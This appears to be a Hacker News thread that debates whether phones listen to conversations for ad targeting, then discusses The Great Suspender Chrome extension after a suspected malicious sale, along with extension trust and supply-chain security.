I think they have some kind of special optimized chip that can listen for only a specific phrase at very low power and wake the rest of the device when it hears it. It seems super unlikely that they can listen constantly to anything anyone says, pick out things that can be advertised for, and show ads for those things the next time the user browses without eating lots of power and data.


The wake phrase is different in different languages, yet they sell the same hardware to everybody. Therefore, obviously, the wake phrase is reprogrammable. It isn't baked into the silicon.


I think the combination of ever-growing lithium-ion battery resource, hardware energy efficiency and performance with 7 and 5nm processes, and improving on-device speech recognition makes it possible with little to no perceived battery life degradation.


This is fear mongering because you literally have no credible proof.


Feel free to take it or leave it.


As you can see I've chose option C: Calling it out as the fear mongering that it is.

Maybe read up on the concept of "extraordinary claims requiring extraordinary evidence"


If this were true, I think a single person, ever, would have been able to furnish evidence of how this actually works.

Since complex voice-recognition (of other than the activation hotword) is done off-device, you will be able to see network traffic as a result of this occurring. That's quite simple to check for.


> complex voice-recognition (of other than the activation hotword) is done off-device

Wrong. It’s been feasible to do on-device for years[0][1].

> That's quite simple to check for.

It’s also quite simple to check that it happens, if you have a Google phone. It’s been done in front of me last year[2]. It’s been demonstrated to happen by other people than me, so you don’t have to rely on my word here[3].

> a single person, ever, would have been able to furnish evidence of how this actually works.

I don’t think it’s easy to show how this works under the hood, since speech can be recognized on device and devices communicate with remote services very verbosely over HTTPS (probably with certificates pinned to prevent MITM) making it non-trivial to distinguish that traffic from background network activity. Recognized speech data doesn’t have to be communicated in real-time, in fact it would make sense to wait and batch it with other requests for efficiency.

(There’s a technical paper[4] that summarizes research in this direction as of 2019, and turns out it’s not trivial to definitely prove or disprove based on network activity.)

[0] https://ai.googleblog.com/2019/03/an-all-neural-on-device-sp...

[1] https://medium.com/better-programming/ios-speech-recognition...

[2] https://news.ycombinator.com/item?id=25622659

[3] https://www.vice.com/en/article/wjbzzy/your-phone-is-listeni...

[4] https://link.springer.com/chapter/10.1007/978-3-030-22479-0_...


While the technology is now somewhat accessible (as of 2019 in both cases you mention), this conspiracy theory dates back nearly to the introduction of smartphones. I have heard it as early as 2011.

A number of other anecdotal experiments, such as one performed by myself, failed to show this behavior. A more tightly controlled but still informal experiment by a vaguely related security firm failed to find this behavior[1]. An academic effort by researchers at Northwestern failed to find this behavior [2]. This is by far the most thorough academic effort on the topic I have seen.

Facebook has clearly denied it [3]. Google has not issued such a clear statement but has been reasonably open about changes in their policy on voice data [4]. After considering the issue from several angles, P. J. Vogt concluded that no such thing happens [5]. Even the paper you cite notes the total lack of evidence.

Perhaps most notably, almost all of the popular media reporting that bears headlines saying that your phone is listening to your conversations, actually say no such thing when you read the article. Instead they are talking about analytics on voice assistant activations and, frequently, voice memos in Facebook Messenger. Amusingly I've run into two cases where popular press had to issue retractions or corrections after they said that smartphones were always-listening.

The only serious sources I have ever seen assert that this is happening are Vice's Sam Nichols based on Dr. Henway. Henway makes some very specific claims to two different reporters but provides no explanation of how he came to that knowledge. To an almost comical extent, nearly all reporting in favor of this theory (that even claims to have a source) is based around the exact same quote from Henway, who has never published anything formal on the matter or even really elaborated beyond a single paragraph. Nichols only performs a very basic experiment and it is easy to come up with other ways he may have gotten the result he did - in fact, the experiment he performs is nearly identical to the ones performed by others that have failed to show results.

Look, I'm not totally unreceptive to the idea that this is happening, but I don't like people repeating the assertion-as-fact that it is a widespread behavior when major tech companies that have denied it, and no real evidence has ever been amassed to show that it does happen.

Just my opinion, but... well, just all of our opinions. Let's be careful about calling them facts.

[1] https://www.wandera.com/phone-listening/ [2] https://www.ftc.gov/system/files/documents/public_events/141... [3] https://www.forbes.com/sites/amitchowdhry/2017/10/31/faceboo... [4] https://www.theverge.com/2020/8/5/21354805/google-email-audi... [5] https://gimletmedia.com/shows/reply-all/z3hlwr


I did not claim any facts beyond reporting my observations.

As to facts, I am not a security researcher myself, so I linked to articles when I encountered such a vehement rejection of my personal experience.

If you are calling me out in what I observed, then you are saying I am delusional or lying.

Google is changing their policies and the News app behavior, so I don’t know whether the experiment I witnessed is reproducible anymore. but I am reasonably sure that they would choose to stop showing relevant content as obviously but keep mining data, as it ultimately aligned with their business model.


> A friend and I were sitting at a bar, iPhones in pockets, discussing our recent trips in Japan and how we’d like to go back. The very next day, we both received pop-up ads on Facebook about cheap return flights to Tokyo.

> A private conversation with a friend about how I’d run out of data led to an ad about cheap 20 GB data plans

> Suddenly I was being told [sic] mid-semester courses at various universities

I absolutely belive Facebook can find system information like data caps, or can read notifications (as they explicitly ask for this to auto-fill SMS-based 2FA logins). As far as being in the same location as your buddy you took a trip with, that's a lack of imagination on the advertisers part - you get ads to return to Japan the same way you get ads for the vacuum you just. bought. As far as the writer possibly going back to school? I'd say many writers enjoy writing - so many, in fact, that prices have been depressed for decades. I'd assume many writers have to return to school and change careers.

Is it possible Facebook is listening? I won't dismiss it without at least reading the article. But the linked article reads like the author believes people are unique and, while they are, they're also far more predicatable than we like to pretend.


Seems like another case where a successful Chrome extension was bought out so it could be used for either:

1. Mining the users' traffic and reselling it as market research, or

2. Using the users' computers as a pool for a residential proxy service, or

3. Replacing and inserting ads into users' browsers.

This is unfortunately quite common.


Who are the main organizations doing that? It seems quite organized.


Chrome extensions are an interesting study in trust. Even with their push for manifest v3, you can still run arbitrary JS on any url. Which, of course, allows arbitrary spying and manipulation.

If they hobble that, though, a large portion of extensions become useless. I don't personally see any real middle ground. It's either a credible risk, or too complicated for practical use. The way manifest v3 hobbles practically required things like heuristics is a good example.


I've had an extension which I downloaded for automatic tab reloading on chrome insert porn ads into YouTube, I think the extension was removed after reporting but considering Google does take payment for publishing extensions (Unlike Mozilla) and puts them through review; Why not do it right?


One of our testers had that addon installed, same issue with porn ads.


Interesting, I remember it being taken down immediately after my complaint it would have been really bad if it had resurfaced.


I know it would break many extensions but I am of the opinion the architecture is all wrong.

There instead should be clear APIs for some access to page content (for example, right-click context menus, tab control without content access, etc).

The idea will probably be met with opposition because I didn’t explain it well enough, but maybe someone will get the idea hah.

I’ve worked on large chrome extensions that heavily rely on hacking UI on top of page content and it’s truly awful. Everything you do feels liked it will break at the setup of a feather, because it does. Sure, there are some ways of making that LESS painful, but at the end of the day it will always be dirty hacks.


Reminds me of the uBlock vs uBlock origin story some years ago:

https://news.ycombinator.com/item?id=9437182

https://news.ycombinator.com/item?id=9718625


Also Nano Blocker. I had to spend HOURS unliking bullshit posts on my Instagram because the idiot maintainer sold it to some quite obviously sleazy dudes who harvested our cookies to use as an Instagram bot.


What a low profile use for such a hack... And the idiot probably got away with 99% of those likes.


That story is still ongoing. "New" ublock is still scamming people


I'd just like to mention that if the community was determined enough we'd

1. Demand removal of analytics software 2. If no action, fork and re-publish.

Obviously folks who aren't technical/didn't see these threads wouldn't get the benefit of an update.

This is something where an explicitly pro-opensource and anti-tracking (or at least minimal tracking) policy by the browser extension stores would be valuable. The store itself could recommend the no-tracking community version instead. Of course this would have to happen on an individual basis and be carefully managed as so not to be abused.


They already did:

https://github.com/aciidic/thegreatsuspender-notrack

Plus you can download the old 7.16 version which works fine and doesn't have the suspicious changes


> This work carries no guarantees only to the best of my ability in 2 hours using notepad2 & AstroGrep. I am not a developer and do not intend to spend much time keeping this extension updated.


Unrelated to the security implications, Microsoft Edge is doing tab suspension natively in the latest builds.

https://www.windowslatest.com/2020/09/17/microsoft-edge-slee...


Vivaldi also has hibernate feature for a while and Firefox too if I'm right.

TGS caused issues resulting in loosing pinned tabs in Brave and Vivaldi and so I had to remove it there; Now I'm glad I had to do it.


Safari has done this for a while now; one of the many reasons you can get tons more battery life running Safari than Chrome.


This type of developer 'switch' is becoming so common that I now have to add my chrome extensions to google alerts so as to feel safe. As a user below comments: "We need to talk about how difficult it is to monetize browser extensions" b/c w/o this we will see this continue.


I wrote a browser extension that interacted with a password manager.

I receive almost-weekly messages from folks offering to buy my extension.



Out of an abundance of paranoia, I always open all financial and secretive websites in Incognito mode, and I always disallow all extensions in Incognito mode.

We should really have separate dedicated browsers just for doing transactions.


Wouldn’t be perfect but I’d like to see the ability to prevent extensions from making any web requests.

I’d also like them to not silently update in the background.


I did the work of downloading a forked version [1] of the extension and disabling the mainline extension.

In doing so, I lost about 60 suspended tabs, with no record in history as to what they were.

In some ways, this is like a weight off my back. On the other hand, I was going to read those tabs, I swear!

Oh well, time for me to search jstor for a history of copper mine consolidation, again.

[1] https://github.com/aciidic/thegreatsuspender-notrack


Many comments in the GitHub issue mention Tabs Outliner as an alternative for the now-sketchy-looking The Great Suspender.

Speaking as a long time paid user of the free/paid Tabs Outliner, I can't recommend it strongly enough.

[0]https://chrome.google.com/webstore/detail/tabs-outliner/eggk...


It does not seem to be open source though. The "Website" link only points back to the Chrome store and I found no mention of source code in the description. The Great Suspender at least was available as open source so one could go from there and a) notice that the release tags stopped, b) use the existing source there.


For me, it is also a superior alternative to Tree Style Tab on Firefox. It has better keyboard shortcuts, and drag and drop support of tabs or entire subtrees is more reliable than TST.

Unloading entire subtrees and restoring them on other computers is also a nice feature that I don't want to miss anymore.

The extension is closed source, and its dev sometimes needs a few weeks for important fixes, but it is still one of my most favorite browser extensions out there.


What prevents bad actors from buying a popular extension and rolling out malicious code to everyone who uses the extension?

I mean except the integrity of extension developers.


This is happening repeatedly. Each extension can possibly go bad at any time if the dev decides to cash out.


That's weird, I think this story is the second one ever that I read on this topic, so I assumed it's rare.


Nothing. I own a few extensions with users in the tens of thousands and receive so many emails from people/business trying to buy out the extensions for "monetization".

This is a huge issue and Google is doing absolutely nothing to address it.


I stopped using Great Suspender a few years back when Chrome built this in https://developers.google.com/web/updates/2015/09/tab-discar...

I encourage people to disable all chrome extensions. They have unprecedented access to your data (they can read your bank credentials), and they are a big performance hit. e.g. using Chrome Devtools you can see that Lastpass doubles page load times.

You can use SimpleExtManager (only has perms to turn on /off extensions) to turn everything off until you need them.


What about useful things like ghostery and uMatrix?


I keep a “temp” browser profile (chrome —> settings —> add user profile) and install extensions there. That way you can use ghostery on specific sites and it has no access to your important data from your main profile


They both have full access. some may say “do you trust these publishers” – but the way extensions are designed, there’s no way to trust them. You have to be extremely vigilant and inspect the code every time the extension updates, and you aren’t notified when there are updates.

I wouldn’t install any extension permanently. I only keep Lastpass and it’s disabled until it’s needed for login.


so we should accept website analytics/tracking scripts that potentially are recording every click and cursor movement under the guise of user research?


Three builds published to Chrome Webstore without corresponding commits published to GitHub.

This Extension being GPLv2, is there a way to report this obvious license violation to Google/GitHub? Would they care?


TGS is absolutely critical for my everyday use: can someone confirm if everything is still as in the linked GitHub issue?


Why would things have suddenly reverted?


This is a problem with many package managers. Even if one downloads a package in Emacs from MELPA. How can one be sure it’s not containing malware? Read through all code every in every dependency after every update?


Curated app stores are great at preventing malware because they prevent you from installing packages from anyone other than the official maintainer, including yourself.


In general, there is a huge problem with how we distribute software, and package managers are even worse.

We basically only look at the top level of things, when instead, every branch in the tree should have a bunch of security people watching it, like editors watch every change to a Wikipedia article, before it goes out.

Corporations using automation and technology have hijacked our "Free Speech" ideals, and caused us to think that it's a good thing when one party can push out a tweet to 5 million people at once, or a single corporation can buy up local stations and enforce talking points on journalism. That's not freedom of speech at all. That's just a preference for maintaining entrenched power because someone "amassed it voluntarily"... and this mentality extends recursively all the way down ... Take for example the first Twitter mega-celebrity. Ashton Kutcher himself amassed it voluntarily because he was chosen by TV and movie executives once upon a time, to be used in mass media, and their platforms were "voluntarily" built in the past, from the invention of the TV, and people subscribed "voluntarily", and Twitter was built "voluntarily" and funded by VCs voluntarily, and so on. And the end result is, some power (in this case, audience) is concentrated in the hands of a few people, who disproportionately act as kingmakers for various other people and ideas. That's also how we get "too big to fail" issues in telecoms, banks, and so on.

In science, things work differently. Arxiv.org exists but peer review is a big thing. Wikipedia has multiple distrusting parties for each large article. So does Bitcoin (presumably, anyway).

In general, the more value (votes, data, code, money) accumulates in one place, the more "checks and balances" you should have for each release. You can't just have someone push out something in the middle of the night and have everyone pull it into their codebase via npm and then "launder" the (malicious) bugs through more and more releases. You need it to go through "peer review", and not on the top level of an entire tree, but rather, for each subtree there need to be people who understand what's going on.

THAT is a society that's far more secure, that can't be easily backdoored by some hackers paid by a state to find vulnerabilities. And the capitalistic system we have today is pushing the other way (closed source, centralized databases, extract rents reward early investors through information asymmetry, etc.) and the result is stuff like SolarWinds, Equifax hack, Yahoo hack, etc. etc. etc. We're finally starting to put a tax on storing data without an explicit purpose, hopefully that will make it expensive enough that people will be custodying their own data at least. But when it comes to "broadcasting" things, I'd rather have less "real time pushes" and instead slow things down until we can "run byzantine consensus" gradually releasing to the public via concentric circles.

The full solution would involve Merkle trees where some security organizations and researchers / peers (anonymous or not, but with reputations) sign off on each changeset. Instead of just Apple or something. Git + Verified Claims can already support most of the infrastructure, btw.


>The full solution would involve Merkle trees where some security organizations and researchers / peers (anonymous or not, but with reputations) sign off on each changeset. Instead of just Apple or something. Git + Verified Claims can already support most of the infrastructure, btw.

This barely works for open source software (how many open source projects have people auditing every commit?). How will it possibly work for closed source software?


As a left-libertarian leaning person, I believe that "the long arc of society bends towards collaboration rather than competition."

I'm talking about:

  Wikipedia beating Britannica and Encarta
  The Web beating AOL / MSN / Compuserve / Prodigy
  Apache and NGinX beating IIS
  Linux beating Windows for tons of apps & archs
  Science beating Alchemy
I mean, I believe it so strongly, I put years and reinvested tons of profits of my own company into an open source platform that would be an alternative to Facebook / LinkedIn / Google etc. (https://github.com/Qbix/Platform). And then I started an experimental project to "disrupt" our own company and decentralize the Web even further (https://intercoin.org). We still have a long way to go, but I think just like the Web unleashed trillions in value that could never be built on top of AOL, we will see the same with Web 2.0 (FAMGA) etc.

But it will take time. Open source collaboration is the tortoise, closed source competition is the hare.


This might address the "closed source" problem (although personally I'm skeptical it would work), but doesn't address the problem of how to get people to perform reviews.


True. That requires different incentives. But we have to move from a mindset of competition to collaboration first. Everyone building on the same platform and merging source code back unless there is a really good reason to fork and compete.


For anyone not clicking the link, TheMageKing opened this issue on Nov 3, 2020.




Consider applying for YC's Winter 2026 batch! Applications are open till Nov 10

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: